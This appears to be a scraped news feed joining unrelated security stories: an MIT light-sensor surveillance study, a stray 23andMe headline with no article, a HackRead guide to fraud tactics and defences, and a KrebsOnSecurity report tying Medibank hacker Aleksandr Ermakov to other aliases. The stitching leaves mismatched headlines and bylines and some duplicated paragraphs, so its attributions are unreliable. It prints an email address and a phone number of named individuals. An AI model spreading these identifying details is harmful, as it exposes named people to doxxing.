Researchers from MIT’s Computer Science and Artificial Intelligence Laboratory have devised an algorithm that could be used to convert data from smart devices' ambient light sensors into an image of the scene in front of the device. A tool like this could be used to turn a smart home gadget or mobile device into a surveillance tool. Ambient light sensors measure light in an environment and automatically adjust a screen's brightness to make it more usable in different conditions. But because ambient light data isn't considered to be sensitive, these sensors automatically have certain permissions in an operating system and generally don't require specific approval from a user to be used by an app. As a result, the researchers point out that bad actors could potentially abuse the readings from these sensors without users having recourse to block the information stream.

23andMe Failed to Detect Account Intrusions for Months

By Uzair Amir
While cybercriminals create their toolbox, as a user you should also keep yourself ready for unsuspecting cyberattacks and keep a safety toolbox for your defence. 
This is a post from HackRead.com Read the original post: Building Your Defense Toolbox: Tools and Tactics to Combat Cyber Threats

It is a well-known fact that cybercriminals have evolved over the years. The emergence of AI-powered malicious chatbots, such as WormGPT and FraudGPT, has enabled malicious threat actors to not only refine their skills but also consolidate all their malicious activities and tools into one, like a toolbox. Understanding these tools is the first step towards safeguarding yourself against their scams.

While cybercriminals create their toolbox, as a user you should also keep yourself ready for unsuspecting cyberattacks and keep a safety toolbox for your defence.

One major part of that toolbox should be a Virtual Private Network or VPN. Why? because this tool hides your real-time IP address and protects your online privacy from cyber criminals and state-backed threat actors. VPNs, like CyberGhost, encrypt your internet connection, shielding your online activities from prying eyes.

Additionally, employing two-factor authentication (2FA), such as Google Authenticator, Microsoft Authenticator, Okta, and Authy, adds an extra security layer, making it harder for fraudsters to gain unauthorized access to your accounts, even if they have your passwords. These tools, combined with regular updates and vigilance, are crucial in safeguarding against sophisticated scams.

Let’s dive into the tools commonly used by fraudsters, followed by the countermeasures you can employ to protect yourself.

****Common Fraud Tactics********Spoofing****

Spoofing is a deceptive practice where fraudsters falsify information to appear as a legitimate entity. This can involve altering caller IDs or email addresses to mimic those of trusted organizations or individuals. The primary goal is to gain the victim’s trust, making them more susceptible to divulging sensitive information or granting access to their accounts.

****Phishing****

Phishing is a widespread technique that involves sending fraudulent communications that appear to come from a reputable source. Typically executed through email, these messages aim to steal sensitive data such as login credentials, credit card numbers, or personal identification information. Phishers often use urgency or fear to bypass rational judgment.

****Fake Profiles****

Creating fake profiles on social media, dating websites, and other platforms is a common tool in a fraudster’s arsenal. These profiles are carefully crafted to appear genuine, often mimicking the identities of real individuals or organizations. The objective is to build trust with potential victims, eventually manipulating them into financial transactions or sharing confidential information.

****Fake Photos and Entities****

Fraudsters frequently utilize stolen or altered images to bolster the credibility of their fake profiles or websites. Additionally, they might establish counterfeit entities, such as businesses or charities, to appear legitimate. These entities are used to facilitate various scams, including fraudulent sales, charity fraud, and investment scams.

The latest and ongoing incident involving deepfake images of Taylor Swift is just one example of the nightmarish scenarios that cybercriminals can create in your life.

****Fake Claims****

Scammers use persuasive narratives and false claims to trick their victims. These may include threats of legal action, false claims of lottery winnings, or other deceptive propositions that require the victim to make payments or provide personal information.

****Misrepresentation****

Fraudsters often impersonate authority figures or institutions using fake names, credentials, and badge numbers. This tactic is designed to intimidate or convince the victim of the legitimacy of their requests, thereby facilitating the extraction of sensitive information or money.

****Computer Pop-ups****

The prevalence of unwanted pop-ups bombarding your screen is a key reason why adblockers have gained immense popularity. Pop-up warnings on computers are commonly used to spread malware or obtain personal information.

These pop-ups often carry false alerts about viruses or security breaches, prompting the user to take immediate action, which usually involves downloading harmful software or calling a fraudulent support number.

****Robocalls****

Automated calls, or robocalls, are used extensively by scammers to reach many potential victims efficiently. These calls might contain deceptive messages about unpaid taxes or lottery winnings or offer fake services, aiming to extract personal information or direct payments.

****Lead Lists****

Lead lists are databases of individuals who have previously fallen for scams. Fraudsters trade and sell these lists, knowing that individuals scammed once are more likely to be targeted and tricked again.

****Secrecy and Persuasion****

A common tactic used by scammers is to demand secrecy from their victims. By insisting that the dealings remain confidential, fraudsters aim to isolate the victim and prevent them from seeking advice or help from others. They often employ a mix of charm, flattery, and threats to manipulate and control their targets.

****Emotional Manipulation****

Emotional manipulation involves fraudsters playing on the victim’s emotions to extract money or personal information. They may pretend to be in a romantic relationship, a distressed family member, or a charity representative. The fabricated scenarios often evoke strong emotional responses, compelling the victim to act impulsively.

****Search Engine Optimization and Malicious Links****

Fraudsters often use search engine optimization techniques (SEO Poisoning) to promote their scam websites, making them appear legitimate and trustworthy in online searches. They also distribute malicious links through emails or messages, which lead to fraudulent websites or directly install malware when clicked.

****Protective Measures Against Fraud********Caller Verification****

Always verify the identity of callers, especially when they request personal information. If someone claims to be from a legitimate organization, hang up and contact the organization directly using a verified phone number to confirm their authenticity.

****Email Caution****

Exercise caution with email links and attachments, especially from unknown senders. Hover over email addresses and links to verify their authenticity. Be cautious of emails that use urgency or pressure tactics to gather personal information or payments.

****Continuous Education****

Staying informed about common scam tactics and trends is essential. Regularly educating oneself and others about the latest fraud methods can significantly reduce the risk of falling victim to these scams. In simple terms, having cybersecurity knowledge for yourself and your employees is the master key to protecting against every known cyberattack to date.

****Anti-Virus Software****

Ensure your devices are protected with reliable and updated anti-virus software. This software is capable of detecting and preventing malware attacks, which are commonly used in various scams.

****Pop-Up Blockers****

Pop-up or ad blockers can prevent malicious ads and links from appearing on your devices. These pop-ups often contain false claims or threats designed to trick users into downloading malware or revealing personal information.

If you are on Chrome browser, you can disable pop-ups from settings. > Chrome > Settings > Privacy and security > Site Settings > Pop-ups and redirects.

****Secure Network Usage****

Avoid conducting sensitive transactions over public wi-fi networks. Always use secure, private networks for online banking, shopping, and other activities that require personal information.

Businesses should employ a variety of fraud detection tools to safeguard their operations. These include:

*   **Geolocation and Proxy Piercing:** Identifying the physical location of transaction attempts can flag suspicious activities, especially if the location mismatches the user’s typical pattern.
*   **Device Fingerprinting:** This tool helps recognize devices used in previous fraudulent activities, enabling businesses to block transactions from these devices.
*   **Address Verification (AVS):** AVS checks if the billing address provided by the customer matches the address on file with the card issuer.
*   **Velocity Checks:** Monitoring the frequency and volume of transactions from a single user can help detect and prevent fraud.
*   **Biometric Verification:** Using biometrics in payment processes adds an extra layer of security.
*   **Blacklists and Whitelists:** These lists allow businesses to control traffic based on known fraudulent sources or trusted entities.
*   **Machine Learning:** AI models can detect patterns indicative of fraud, improving over time as they process more data.
*   **3-D Secure Technology:** This adds authentication steps for online credit and debit card transactions, reducing the risk of card-not-present fraud.
*   **Fraud Scoring:** Analyzing transactions based on various risk factors helps identify potentially fraudulent activities.

****Regular Updates and Vigilance****

Keeping software and fraud detection tools up to date is crucial. Regularly updating your knowledge about new fraud tactics and protective measures can help you stay ahead of scammers.

****Conclusion****

Fraudsters are always changing their tactics, which makes it crucial for individuals and businesses to stay informed and alert. Understanding the tools used by fraudsters and implementing strong protective measures can significantly reduce the risk of falling victim to these sophisticated scams. Regular updates, continuous education, and employing advanced fraud detection tools are key to safeguarding against these threats.

****_RELATED ARTICLES_****

1.  **What is an OSINT Tool – Best OSINT Tools**
2.  **McAfee’s Mockingbird AI Tool Detects Deepfake Audio**
3.  **Temporary Phone Number: An Essential Tool for Privacy Protection**
4.  **Kaspersky’s iShutdown Tool Detects Pegasus Spyware on iOS Devices**
5.  **Understanding Reverse Email Lookup: A Tool to Strengthen Cybersecurity**

Building Your Defense Toolbox: Tools and Tactics to Combat Cyber Threats

Authorities in Australia, the United Kingdom and the United States this week levied financial sanctions against a Russian man accused of stealing data on nearly 10 million customers of the Australian health insurance giant Medibank. 33-year-old Aleksandr Ermakov allegedly stole and leaked the Medibank data while working with one of Russia's most destructive ransomware groups, but little more is shared about the accused. Here's a closer look at the activities of Mr. Ermakov's alleged hacker handles.

Authorities in Australia, the United Kingdom and the United States this week levied financial sanctions against a Russian man accused of stealing data on nearly 10 million customers of the Australian health insurance giant **Medibank**. 33-year-old **Aleksandr Ermakov** allegedly stole and leaked the Medibank data while working with one of Russia’s most destructive ransomware groups, but little more is shared about the accused. Here’s a closer look at the activities of Mr. Ermakov’s alleged hacker handles.

Aleksandr Ermakov, 33, of Russia. Image: Australian Department of Foreign Affairs and Trade.

The allegations against Ermakov mark the first time Australia has sanctioned a cybercriminal. The documents released by the Australian government included multiple photos of Mr. Ermakov, and it was clear they wanted to send a message that this was personal.

It’s not hard to see why. The attackers who broke into Medibank in October 2022 stole 9.7 million records on current and former Medibank customers. When the company refused to pay a $10 million ransom demand, the hackers selectively leaked highly sensitive health records, including those tied to abortions, HIV and alcohol abuse.

The U.S. government says Ermakov and the other actors behind the Medibank hack are believed to be linked to the Russia-backed cybercrime gang **REvil**.

“REvil was among the most notorious cybercrime gangs in the world until July 2021 when they disappeared. REvil is a ransomware-as-a-service (RaaS) operation and generally motivated by financial gain,” a statement from the **U.S. Department of the Treasury** reads. “REvil ransomware has been deployed on approximately 175,000 computers worldwide, with at least $200 million paid in ransom.”

The sanctions say Ermakov went by multiple aliases on Russian cybercrime forums, including **GustaveDore**, **JimJones**, and Blade Runner. A search on the handle GustaveDore at the cyber intelligence platform Intel 471 shows this user created a ransomware affiliate program in November 2021 called **Sugar** (a.k.a. Encoded01), which focused on targeting single computers and end-users instead of corporations.

An ad for the ransomware-as-a-service program Sugar posted by GustaveDore warns readers against sharing information with security researchers, law enforcement, or “friends of Krebs.”

In November 2020, Intel 471 analysts concluded that GustaveDore’s alias JimJones “was using and operating several different ransomware strains, including a private undisclosed strain and one developed by the REvil gang.”

In 2020, GustaveDore advertised on several Russian discussion forums that he was part of a Russian technology firm called Shtazi, which could be hired for computer programming, web development, and “reputation management.” Shtazi’s website remains in operation today.

A Google-translated version of Shtazi dot ru. Image: Archive.org.

The third result when one searches for **shtazi\[.\]ru** in Google is an **Instagram** post from a user named **Mikhail Borisovich Shefel**, who promotes Shtazi’s services as if it were also his business. If this name sounds familiar, it’s because in December 2023 KrebsOnSecurity identified Mr. Shefel as “Rescator,” the cybercriminal identity tied to tens of millions of payment cards that were stolen in 2013 and 2014 from big box retailers Target and Home Depot, among others.

How close was the connection between GustaveDore and Mr. Shefel? The Treasury Department’s sanctions page says Ermakov used the email address **ae.ermak@yandex.ru**. A search for this email at DomainTools.com shows it was used to register just one domain name: **millioner1\[.\]com**. DomainTools further finds that a phone number tied to Mr. Shefel (79856696666) was used to register two domains: **millioner\[.\]pw**, and **shtazi\[.\]net**.

The December 2023 story here that outed Mr. Shefel as Rescator noted that Shefel recently changed his last name to “**Lenin**,” and had launched a service called Lenin\[.\]biz that sells physical USSR-era Ruble notes that bear the image of Vladimir Lenin, the founding father of the Soviet Union. The Instagram account for Mr. Shefel includes images of stacked USSR-era Ruble notes, as well as multiple links to Shtazi.

The Instagram account of Mikhail Borisovich Shefel, aka MikeMike aka Rescator.

In a report published this week, Intel 471 said investigators connected Ermakov to REvil because the stolen Medibank data was published on a blog that had one time been controlled by REvil affiliates who carried out attacks and paid an affiliate fee to the gang.

But by the time of the Medibank hack, the REvil group had mostly scattered after a series of high-profile attacks led to the group being disrupted by law enforcement. In November 2021, **Europol** announced it arrested seven REvil affiliates who collectively made more than $230 million worth of ransom demands since 2019. At the same time, U.S. authorities unsealed two indictments against a pair of accused REvil cybercriminals.

“The posting of Medibank’s data on that blog, however, indicated a connection with that group, although the connection wasn’t clear at the time,” Intel 471 wrote. “This makes sense in retrospect, as Ermakov’s group had also been a REvil affiliate.”

It is easy to dismiss sanctions like these as ineffective, because as long as Mr. Ermakov remains in Russia he has little to fear of arrest. However, his alleged role as an apparent top member of REvil paints a target on him as someone who likely possesses large sums of cryptocurrency, said **Patrick Gray**, the Australian co-host and founder of the security news podcast **Risky Business**.

“I’ve seen a few people poo-poohing the sanctions…but the sanctions component is actually less important than the doxing component,” Gray said. “Because this guy’s life just got a lot more complicated. He’s probably going to have to pay some bribes to stay out of trouble. Every single criminal in Russia now knows he is a vulnerable 33 year old with an absolute ton of bitcoin. So this is not a happy time for him.”

Tag

#google